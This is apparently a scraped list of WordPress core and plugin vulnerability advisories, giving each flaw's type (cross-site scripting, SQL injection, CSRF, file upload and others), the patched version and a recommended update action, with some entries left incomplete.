Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ACF Photo Gallery Field

Vulnerability: Authenticated (Subscriber+) Arbitrary Usermeta Update
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Connect Matomo (WP-Matomo, WP-Piwik)

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Display Name
Patched Version: 1.0.28
Recommended Action: Update to version 1.0.28, or a newer patched version

Plugin: Translate WordPress – Google Language Translator

Vulnerability: Cross-Site Scripting
Patched Version: 5.0.06
Recommended Action: Update to version 5.0.06, or a newer patched version

Plugin: Contact Form Integrated With Google Maps

Vulnerability: 2.4
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Leaflet Maps Marker Pro

Vulnerability: Arbitrary File Deletion
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Simple Long Form

Plugin: flickrRSS

Plugin: ScrollReveal.js Effects

Plugin: ECPay Logistics for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.1910240
Recommended Action: Update to version 1.3.1910240, or a newer patched version

Plugin: Privacy Policy Generator, Terms & Conditions Generator WordPress Plugin : WP Legal Pages

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.24
Recommended Action: Update to version 2.0.24, or a newer patched version

Plugin: LiveChat – WP live chat plugin for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.7.4
Recommended Action: Update to version 3.7.4, or a newer patched version

Plugin: Far Future Expiry Header

Vulnerability: Plugin’s Settings Update via Cross-Site Request Forgery
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: YaySMTP – WP SMTP Plugin with Full Email Log & 15+ SMTP Services

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: 3.1.3
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.2.6
Recommended Action: Update to version 1.3.2.6, or a newer patched version

Plugin: WordPress Landing Pages

Vulnerability: Authenticated SQL Injection
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: WooPayments: Integrated WooCommerce Payments

Vulnerability: Unauthenticated Insecure Direct Object Reference
Patched Version: 6.7.0
Recommended Action: Update to version 6.7.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting in the Block Editor
Patched Version: 3.7.33
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.33, 3.8.33, 3.9.31, 4.0.30, 4.1.30, 4.2.27, 4.3.23, 4.4.22, 4.5.21, 4.6.18, 4.7.17, 4.8.13, 4.9.14, 5.0.9, 5.1.5, 5.2.6, 5.3.3, 5.4.1

Plugin: MS-Reviews

Plugin: Plugmatter Pricing Table Lite

Plugin: Template Kit – Import

Vulnerability: Authenticated (Contributor+) Arbitrary File Upload
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Resource Exhaustion
Patched Version: 1.9.10.58
Recommended Action: Update to version 1.9.10.58, or a newer patched version

Plugin: Email Encoder – Protect Email Addresses and Phone Numbers

Vulnerability: Reflected Cross Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: User Avatar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.12
Recommended Action: Update to version 1.4.12, or a newer patched version

Plugin: ithemes-exchange

Vulnerability: Cross-Site Scripting
Patched Version: 1.12.0
Recommended Action: Update to version 1.12.0, or a newer patched version

Plugin: Modula Image Gallery

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: WP e-Commerce Swipe plugin

Plugin: WP Plugin Info Card

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via option_id GET
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Team

Vulnerability: Authenticated (Contibutor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SpamReferrerBlock

Plugin: WP Visitor Statistics (Real Time Traffic)

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: CampTix Event Ticketing

Vulnerability: CSV Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: WP Tabs – Responsive Tabs and Custom Product Tabs

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WP Job Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Scripting
Patched Version: 2.9.19
Recommended Action: Update to version 2.9.19, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.4
Recommended Action: Update to version 4.2.4, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.47
Recommended Action: Update to version 1.0.47, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: reCaptcha Protection Bypass
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: WP Responsive header image slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quotes for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: SQL Injection via bwg_search_x Parameter
Patched Version: 1.5.55
Recommended Action: Update to version 1.5.55, or a newer patched version

Plugin: Export Users With Meta

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 0.6.5
Recommended Action: Update to version 0.6.5, or a newer patched version

Plugin: UpQode Google Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Admin Columns

Vulnerability: No subtitle
Patched Version: 4.3.2
Recommended Action: Update to version 4.3.2, or a newer patched version

Plugin: Event List

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 0.8.8
Recommended Action: Update to version 0.8.8, or a newer patched version

Plugin: WP Job Manager

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.23.8
Recommended Action: Update to version 1.23.8, or a newer patched version

Core: WordPress

Vulnerability: Contributor Users Can Publish Posts
Patched Version: 3.7.2
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.2, 3.8.2

Plugin: Ping List Pro

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Missing Authorization
Patched Version: 6.4.2
Recommended Action: Update to version 6.4.2, or a newer patched version

Plugin: Social Media Feather | social media sharing

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Insecure Direct Object Reference
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.16.9
Recommended Action: Update to version 1.16.9, or a newer patched version

Plugin: WP Sentry

Plugin: Custom More Link Complete

Plugin: Category SEO Meta Tags

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.1
Recommended Action: Update to version 9.1, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: SQL Injection
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Left right image slideshow gallery

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 12.1
Recommended Action: Update to version 12.1, or a newer patched version

Plugin: Cab fare calculator

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Ajax Domain Checker

Plugin: HTTP Headers

Vulnerability: Server-Side Request Forgery
Patched Version: 1.19.0
Recommended Action: Update to version 1.19.0, or a newer patched version

Plugin: tagDiv Composer

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Sermon Browser

Vulnerability: Cross-Site Scripting
Patched Version: 0.43.6
Recommended Action: Update to version 0.43.6, or a newer patched version

Plugin: Custom Body Class

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.7.0
Recommended Action: Update to version 0.7.0, or a newer patched version

Plugin: Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction

Vulnerability: Cross-Site Request Forgery via ajax_add_log_entry
Patched Version: 2.10.5
Recommended Action: Update to version 2.10.5, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Authenticated Stored Cross Site Scripting
Patched Version: 11.6-RC5
Recommended Action: Update to version 11.6-RC5, or a newer patched version

Plugin: 404 to 301 – Redirect, Log and Notify 404 Errors

Vulnerability: SQL Injection
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Interact: Embed A Quiz On Your Site

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: WPML

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5.14
Recommended Action: Update to version 4.5.14, or a newer patched version

Plugin: contus-video-comments

Plugin: WP Meta SEO

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 4.4.9
Recommended Action: Update to version 4.4.9, or a newer patched version

Plugin: Auto Upload Images

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Livestream Notice

Plugin: File Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more

Vulnerability: Server-Side Request Forgery
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via filter_list parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Translate WordPress with GTranslate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.7
Recommended Action: Update to version 2.9.7, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated PHP Object Injection
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Relevanssi – A Better Search

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: InPost Gallery

Vulnerability: Reflected Cross-Site Scripting via ‘imgurl’
Patched Version: 2.1.4.2
Recommended Action: Update to version 2.1.4.2, or a newer patched version

Plugin: SEO Backlinks

Plugin: exchange-addon-table-rate-shipping

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: DZS Video Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 9.64
Recommended Action: Update to version 9.64, or a newer patched version

Plugin: Zendrop – Global Dropshipping

Vulnerability: Arbitrary File Upload
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: Like Button Rating ♥ LikeBtn

Vulnerability: Unauthorised Vote Export to Email & IP Addresses Disclosure
Patched Version: 2.6.38
Recommended Action: Update to version 2.6.38, or a newer patched version

Plugin: Simple Newsletter Plugin – Noptin

Vulnerability: Unauthenticated CSV Injection
Patched Version: 1.11.0
Recommended Action: Update to version 1.11.0, or a newer patched version

Plugin: Hero Maps Premium

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: [GWA] AutoResponder

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Missing Authorization
Patched Version: 4.7.2
Recommended Action: Update to version 4.7.2, or a newer patched version

Plugin: Spreadsheet Integration – Automate Google Sheets With WordPress, WooCommerce & Most Popular Form Plugins. Also, Display Google sheet as a Table.

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: WP-UserOnline

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.88.0
Recommended Action: Update to version 2.88.0, or a newer patched version

Plugin: Invite Anyone

Vulnerability: Improper Input Validation
Patched Version: 1.3.16
Recommended Action: Update to version 1.3.16, or a newer patched version

Plugin: Webcam Video Conference

Vulnerability: Arbitrary File Upload
Patched Version: 4.51
Recommended Action: Update to version 4.51, or a newer patched version

Plugin: Instant Images – One-click Image Uploads from Unsplash, Openverse, Pixabay, Pexels, and Giphy

Vulnerability: Authenticated (Author+) Server-Side Request Forgery via instant_images_download
Patched Version: 5.1.0.2
Recommended Action: Update to version 5.1.0.2, or a newer patched version

Plugin: Automatic Youtube Video Posts Plugin

Plugin: WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts

Vulnerability: Arbitrary Usermeta Update to Authenticated (Subscriber+) Privilege Escalation
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Authenticated Page Creation and Status Modification
Patched Version: 3.2.6.9
Recommended Action: Update to version 3.2.6.9, or a newer patched version

Plugin: Responsive Lightbox2

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: PDF Builder for WooCommerce. Create invoices,packing slips and more

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 1.2.91
Recommended Action: Update to version 1.2.91, or a newer patched version

Plugin: avalex – Automatisch sichere Rechtstexte

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: My WP Customize Admin/Frontend

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 1.21.1
Recommended Action: Update to version 1.21.1, or a newer patched version

Plugin: DX Share Selection

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Ibtana – Ecommerce Product Addons

Vulnerability: Ecommerce Product Addons <= 0.2.3
Patched Version: 0.2.4
Recommended Action: Update to version 0.2.4, or a newer patched version

Plugin: Download Monitor

Vulnerability: Authenticated (Administrator+) Arbitrary File Download
Patched Version: 4.5.98
Recommended Action: Update to version 4.5.98, or a newer patched version

Plugin: Multiple Page Generator Plugin – MPG

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.10
Recommended Action: Update to version 3.3.10, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Authenticated (Subscriber+) Arbitrary Post Deletion
Patched Version: 1.3.56
Recommended Action: Update to version 1.3.56, or a newer patched version

Plugin: InstaWP Connect – 1-click WP Staging & Migration

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 0.1.0.9
Recommended Action: Update to version 0.1.0.9, or a newer patched version

Plugin: WP-TopBar

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.03
Recommended Action: Update to version 4.03, or a newer patched version

Plugin: WP All Import Pro

Vulnerability: Missing Authorization and Cross-Site Request Forgery Checks
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: WPBook

Vulnerability: Unauthenticated Cross-Site Request Forgery
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated PHP Object Injection
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Article analytics

Plugin: Contact Us all-in-one button

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: Payment Button for PayPal

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3.8
Recommended Action: Update to version 1.2.3.8, or a newer patched version

Plugin: WP Adminify – Custom WordPress Dashboard, Login and Admin Customizer

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Tags Cloud Manager

Plugin: Google Analytics 4 (GA4), Google Ads, Meta Pixel, GTM & Multiple Pixels for Woocommerce & WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.5.4
Recommended Action: Update to version 6.5.4, or a newer patched version

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: Content Spoofing
Patched Version: 2.9.9.3.5
Recommended Action: Update to version 2.9.9.3.5, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in exec_multitask_widgets function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: WP-PostRatings

Vulnerability: IP Spoofing
Patched Version: 1.91.1
Recommended Action: Update to version 1.91.1, or a newer patched version

Plugin: Post Status Notifier Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.11.1
Recommended Action: Update to version 1.11.1, or a newer patched version

Plugin: Add Widgets to Page

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting via Customizer
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.15, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: SS Quiz

Vulnerability: Unspecified Vulnerabilities
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Moova for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Authenticated (Contributor+) Information Disclosure
Patched Version: 6.0.3
Recommended Action: Update to version 6.0.3, or a newer patched version

Plugin: TheCartPress eCommerce Shopping Cart

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: SQL Injection
Patched Version: 3.8.8
Recommended Action: Update to version 3.8.8, or a newer patched version

Plugin: JobBoardWP – Job Board Listings and Submissions

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: White Label CMS

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Live Scores for SportsPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: BadgeOS

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Contus Video Gallery

Plugin: AJAX Store Locator

Plugin: Ultimate Addons for WPBakery

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.16.12
Recommended Action: Update to version 3.16.12, or a newer patched version

Plugin: WebLibrarian

Vulnerability: Reflected Cross-Site Scripting via multiple parameters
Patched Version: 3.5.8.2
Recommended Action: Update to version 3.5.8.2, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.9
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.9, 3.8.9, 3.9.7, 4.0.6, 4.1.6, 4.2.3

Core: WordPress

Vulnerability: SQL Injection via Mishandled Placeholders
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 8.5.6
Recommended Action: Update to version 8.5.6, or a newer patched version

Plugin: MultiSafepay plugin for WooCommerce

Vulnerability: Arbitrary File Read
Patched Version: 4.16.0
Recommended Action: Update to version 4.16.0, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.16
Recommended Action: Update to version 1.9.16, or a newer patched version

Plugin: Quick Call Button

Plugin: Greg’s High Performance SEO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Twitter Cards Meta – Best Twitter Card Plugin for WordPress

Plugin: Brands for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Google Analytics Dashboard for WordPress <= 5.4.4
Patched Version: 5.4.5
Recommended Action: Update to version 5.4.5, or a newer patched version

Plugin: Featurific For WordPress

Plugin: Favicon by RealFaviconGenerator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.13
Recommended Action: Update to version 1.2.13, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated OAuth Connection Key Disclosure
Patched Version: 3.4.34.1
Recommended Action: Update to version 3.4.34.1, or a newer patched version

Plugin: Spiffy XSPF Player

Plugin: WooCommerce Chained Products

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: Coming soon and Maintenance mode

Vulnerability: Cross-Site request Forgery to Arbitrary Email Send
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: PHP Object Injection
Patched Version: 5.0.1
Recommended Action: Update to version 5.0.1, or a newer patched version

Plugin: Hyphenator

Plugin: Pricing Table by Supsystic

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: neuvoo-jobroll

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 7.3.2
Recommended Action: Update to version 7.3.2, or a newer patched version

Plugin: Novelist

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Book Information Fields
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Cross-Site Request Forgery via ‘setIgnore’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Uji Countdown

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Random Text

Plugin: The School Management Pro

Vulnerability: Remote Code Execution
Patched Version: 9.9.7
Recommended Action: Update to version 9.9.7, or a newer patched version

Plugin: Latest Tweets Widget

Vulnerability: Arbitrary Settings Update via Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom CSS Pro

Vulnerability: Cross-site Request Forgery
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar

Vulnerability: Missing Authorization to Template Import
Patched Version: 4.10.1
Recommended Action: Update to version 4.10.1, or a newer patched version

Plugin: Tera Charts

Vulnerability: Directory Traversal
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: Crisp – Live Chat and Chatbot

Vulnerability: No subtitle
Patched Version: 0.32
Recommended Action: Update to version 0.32, or a newer patched version

Plugin: Advanced Admin Search

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: WP OAuth2 Server

Plugin: S2W – Import Shopify to WooCommerce

Vulnerability: Authenticated (Admin+) Local File Inclusion
Patched Version: 1.1.13
Recommended Action: Update to version 1.1.13, or a newer patched version

Plugin: AccessAlly

Vulnerability: Arbitrary Code Execution
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Protected Posts Logout Button

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Smartideo

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Core: WordPress

Vulnerability: Authenticated(Contributor+) Sensitive Information Exposure via Comments on Protected Posts
Patched Version: 4.1.39
Recommended Action: Update to one of the following versions, or a newer patched version: 4.1.39, 4.2.36, 4.3.32, 4.4.31, 4.5.30, 4.6.27, 4.7.27, 4.8.23, 4.9.24, 5.0.20, 5.1.17, 5.2.19, 5.3.16, 5.4.14, 5.5.13, 5.6.12, 5.7.10, 5.8.8, 5.9.8, 6.0.6, 6.1.4, 6.2.3, 6.3.2

Plugin: Store Locator for WordPress with Google Maps – LotsOfLocales

Vulnerability: SQL Injection
Patched Version: 3.34
Recommended Action: Update to version 3.34, or a newer patched version

Plugin: Gallery – Photo Albums Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.29
Recommended Action: Update to version 1.2.29, or a newer patched version

Plugin: Rock Convert

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: Login with TOTP (Google Authenticator, Microsoft Authenticator)

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: WP-dTree

Plugin: Blog Grid & Post Grid – Blog Post Slider, Blog Post Carousel, Blog Post Ticker, Blog Post Masonry, Category Post Grid By News & Blog Designer Pack

Vulnerability: Authenticated (Contributor+) Stored Cross-Site SQcripting via Shortcode
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.7
Recommended Action: Update to version 3.6.7, or a newer patched version

Plugin: FAQs Manager

Plugin: WP DSGVO Tools (GDPR)

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.1.24
Recommended Action: Update to version 3.1.24, or a newer patched version

Plugin: Content Egg

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: Weblizar Pin Feeds

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: WP Hotel Booking

Vulnerability: Remote Code Execution
Patched Version: 1.10.4
